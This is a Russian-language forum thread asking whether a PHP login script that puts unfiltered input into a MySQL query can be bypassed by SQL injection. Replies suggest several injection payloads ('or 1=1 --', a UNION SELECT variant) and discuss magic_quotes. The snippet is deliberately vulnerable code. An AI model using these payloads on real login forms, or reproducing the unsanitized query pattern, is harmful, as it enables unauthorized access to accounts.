Подскажите,кто "в теме", можно ли сделать иньекцию в таком коде:


$password=пароль,не фильтруется
$login=логин,не фильтруется

$password=md5($password);
$login=mysql_query("select * from usertable where username='$login' and password='$password'");
$check = mysql_num_rows($login);
if ($check>0) {
Мы авторизовались
};


Казалось бы, $login равный

abc' or 1=1 or 'a'='a

должен бы помочь, но не помогает...

| Сообщение посчитали полезным:

А так ?
$login="abc' or 1=1 or '111'="
$password=" or 'a'='a"
ps а.. не, не пойдет

| Сообщение посчитали полезным:

Думою что можно. Дай сам скрипт.

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

v0id2k
Так то что выше - это и есть скрипт авторизации.

| Сообщение посчитали полезным:

пробуй

abc' or 1=1 --

(abc' or 1=1[пробел][тире][тире][пробел])

p.s.
если и так не выйдет, значит на сервере включён magic_quotes и кавычки фильтруется автоматом

| Сообщение посчитали полезным:

arnix
Не сработало... Видимо придется раскатать связку apache+php+mysql, и там пойму,в чем дело,чего не получается ничего сделать... Я вот думаю, может там magic_quotes активировано?

| Сообщение посчитали полезным:

А вот так:
$login="abc' or 1=1 union select * from usertable where 'a'='a"


| Сообщение посчитали полезным:

Malice
Проблема в том, что $login нигде не выводится, поэтому даже если и сработал бы код,то результат негде увидеть.

| Сообщение посчитали полезным: